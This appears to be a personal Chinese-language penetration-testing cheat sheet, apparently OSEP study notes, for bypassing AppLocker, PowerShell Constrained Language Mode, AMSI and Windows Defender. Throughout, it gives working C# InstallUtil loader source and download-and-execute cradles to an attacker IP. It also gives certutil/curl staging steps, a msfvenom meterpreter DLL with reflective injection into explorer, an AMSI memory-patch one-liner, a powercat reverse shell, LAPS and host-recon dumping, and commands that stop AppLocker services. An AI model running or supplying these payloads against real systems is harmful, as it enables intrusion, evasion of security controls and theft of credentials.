# applocker-checker
#### 检测是否配置了applocker（下面的命令只列出 Exe 规则集合；SrpV2 下还有 Dll、Msi、Script 等集合，需要分别检查）
```
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
```
#### 白名单
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\spool\drivers\color
```
#### 常用方式-bypass clm
csharp code
```cs
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;
namespace Bypass
{
/// <summary>
/// Decoy entry point. When the assembly is run directly this is all that executes;
/// the payload below is only reached through the Installer hook.
/// </summary>
class Program
{
static void Main(string[] args)
{
Console.WriteLine("Nothing going on in this binary.");
}
}
// RunInstaller(true) makes InstallUtil.exe instantiate this class; the command line
// used on this page passes /U, so it is Uninstall (not Install) that runs.
// Detection note: no powershell.exe child is created here — the signal is
// InstallUtil.exe loading System.Management.Automation and reaching out over HTTP.
[System.ComponentModel.RunInstaller(true)]
public class Sample : Installer
{
/// <summary>
/// Installer hook that hosts PowerShell in-process and runs a download cradle:
/// fetches a script body over plain HTTP and pipes it to Invoke-Expression.
/// </summary>
/// <param name="savedState">Installer state supplied by the framework; not used.</param>
public override void Uninstall(System.Collections.IDictionary savedState)
{
// The script body comes from an unauthenticated HTTP URL and is executed as-is.
String cmd = "(New-Object Net.WebClient).DownloadString('http://192.168.49.84/run.txt') | iex";
//String cmd = "(New-object Net.WebClient).DownloadFile('http://192.168.49.57/shell.exe','c:/users/public/a.exe');start-process 'c:/users/public/a.exe'";
//String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.57/met.dll');(New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid";
// A fresh runspace inside this process; the page labels this the CLM bypass.
// NOTE(review): whether this runspace ends up Full or Constrained depends on the
// host's lockdown policy — confirm on the target rather than assuming.
// NOTE(review): script block logging is engine-level, so the AddScript content
// should still be recorded for an in-process host — confirm.
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(cmd);
// Output and error streams are discarded; ps.HadErrors is never checked.
ps.Invoke();
// Not in a finally block: an exception from Invoke() leaves the runspace open.
rs.Close();
}
}
}
```
```
atk
certutil -encode Bypass.exe bypass.txt
victim
del C:\Windows\System32\spool\drivers\color\bypass.txt
del C:\Windows\System32\spool\drivers\color\bypass.exe
//bitsadmin /Transfer myJob http://192.168.49.57/bypass.txt C:\Windows\System32\spool\drivers\color\bypass.txt
curl http://192.168.49.84/bypass.txt -o C:\Windows\System32\spool\drivers\color\bypass.txt
certutil -decode C:\Windows\System32\spool\drivers\color\bypass.txt C:\Windows\System32\spool\drivers\color\bypass.exe && del C:\Windows\System32\spool\drivers\color\bypass.txt
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\System32\spool\drivers\color\bypass.exe
```
#### 搭配食用
```
powershell "((New-Object Net.WebClient).DownloadString('http://192.168.49.57/hunter.txt') |IEX);Invoke-HostRecon" > c:/users/public/a.txt
```
##### powershell受限模式绕过
食用同上
```cs
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;
namespace Bypass
{
/// <summary>
/// Decoy entry point; only this runs when the assembly is started directly.
/// </summary>
class Program
{
static void Main(string[] args)
{
Console.WriteLine("This is the main method which is a decoy");
}
}
// Same InstallUtil.exe /U hosting pattern as the listing above, but used as a
// diagnostic: it records which language mode the in-process runspace actually has.
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
/// <summary>
/// Installer hook that opens an in-process runspace and writes its
/// $ExecutionContext.SessionState.LanguageMode to C:\Tools\test.txt.
/// </summary>
/// <param name="savedState">Installer state supplied by the framework; not used.</param>
public override void Uninstall(System.Collections.IDictionary savedState)
{
// The output path is hard-coded; C:\Tools must already exist or Out-File fails
// silently here, since the error stream is never inspected.
String cmd = "$ExecutionContext.SessionState.LanguageMode | Out-File -FilePath C:\\Tools\\test.txt";
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(cmd);
// Result and ps.HadErrors are discarded.
ps.Invoke();
// Not in a finally block: an exception from Invoke() leaves the runspace open.
rs.Close();
}
}
}
```
```
bitsadmin /Transfer myJob http://192.168.49.84/bypasspowershell.txt C:\Windows\System32\spool\drivers\color\bypasspowershell.txt
curl http://192.168.49.84/bypasspowershell.txt -o C:\Windows\System32\spool\drivers\color\bypasspowershell.txt
certutil -decode C:\Windows\System32\spool\drivers\color\bypasspowershell.txt C:\Windows\System32\spool\drivers\color\bypasspowershell.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\System32\spool\drivers\color\bypasspowershell.exe
```
##### 反射dll返回
直接改代码即可；估计也是由于没有带上 AMSI 绕过而失败了
```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.84 LPORT=443 EXITFUNC=thread -f dll -o met.dll
String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.84/met.dll');(New-Object System.Net.WebClient).DownloadString('http://192.168.49.84/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid";
String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.84/met.dll');(New-Object System.Net.WebClient).DownloadString('http://192.168.49.84/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name spoolv).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid";
```
```
bitsadmin /Transfer myJob http://192.168.49.84/dllshell.txt C:\Windows\System32\spool\drivers\color\dllshell.txt
curl http://192.168.49.84/dllshell.txt -o C:\Windows\System32\spool\drivers\color\dllshell2.txt
certutil -decode C:\Windows\System32\spool\drivers\color\dllshell2.txt C:\Windows\System32\spool\drivers\color\dllshell2.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\System32\spool\drivers\color\dllshell2.exe
```
##### 擦 自定义一个满shell的
```
//这个sleep一定要
String cmd = "(New-Object System.Net.WebClient).DownloadData('http://192.168.49.57/amsi.txt');(New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/run.ps1') | IEX;Start-Sleep -Seconds 100000";
curl http://192.168.49.84/custompsshell.txt -o C:\Windows\System32\spool\drivers\color\custompsshell1.txt
certutil -decode C:\Windows\System32\spool\drivers\color\custompsshell1.txt C:\Windows\System32\spool\drivers\color\custompsshell1.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\System32\spool\drivers\color\custompsshell1.exe
```
#### 搞来搞去烦死了 关掉
```
https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/delete-an-applocker-rule
sc stop appid
sc stop appidsvc
sc stop applockerfltr
sc.exe config applockerfltr start=demand
sc.exe config appid start=demand
sc.exe config appidsvc start=demand
appidtel.exe stop [-mionly]
```
#### temp_bak
#### CLM
```
$ExecutionContext.SessionState.LanguageMode
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
$ExecutionContext.SessionState.LanguageMode = "FullLanguage"
https://sp00ks-git.github.io/posts/CLM-Bypass/
```
#### LAPS + applocker 问题快速定位 以及hunter
在C#代码里
//hunter
```
(New-Object System.Net.WebClient).DownloadData('http://192.168.49.84/amsi.txt');(New-Object Net.WebClient).DownloadString('http://192.168.49.84/hunter.txt') |IEX;Invoke-HostRecon > c:/users/public/a.txt
```
//laps
```
(New-Object System.Net.WebClient).DownloadData('http://192.168.49.84/amsi.txt');(New-Object Net.WebClient).DownloadString('http://192.168.49.84/LAPSToolkit.ps1') |IEX;Get-LAPSComputers >> c:/users/public/laps.txt ; Find-LAPSDelegatedGroups >> c:/users/public/laps.txt ; Get-NetGroupMember -GroupName \"LAPS Password Readers\" >> c:/users/public/laps.txt
```
#### shell+amsi+applocker
//有时因为payload原因 可能会失败
```
String cmd = "(New-Object Net.WebClient).DownloadString('http://192.168.49.84/amsi.txt')|IEX";
amsi.txt
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
(New-Object Net.WebClient).DownloadString('http://192.168.49.84/run.ps1')|IEX
Start-Sleep -Seconds 100000
```
##### 备选方案 成功
这种方式过了 WD：先 bypass AMSI 再加载 powercat，可避免 powercat 被 WD 识别
```
String cmd = "(New-Object Net.WebClient).DownloadString('http://192.168.49.84/amsi.txt')|IEX";
amsi.txt
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
(New-Object Net.WebClient).DownloadString('http://192.168.49.84/powercat.ps1')|IEX ;powercat -c 192.168.49.84 -p 443 -e cmd
```
##### 实在不行就制作一个 HW 来对抗 WD
[[999999-osep-tips-public/osep-速查专用库/geek-osep/bypass av/bypass WD/Hollowing process]]
## 一键applocker
```
autorun applock.
1. 将 applocker 程序用 certutil 编码生成 autoapplocker.txt，放至目录
2. 在 80 端口开启 web 服务，运行准备好的 fm 即可。
```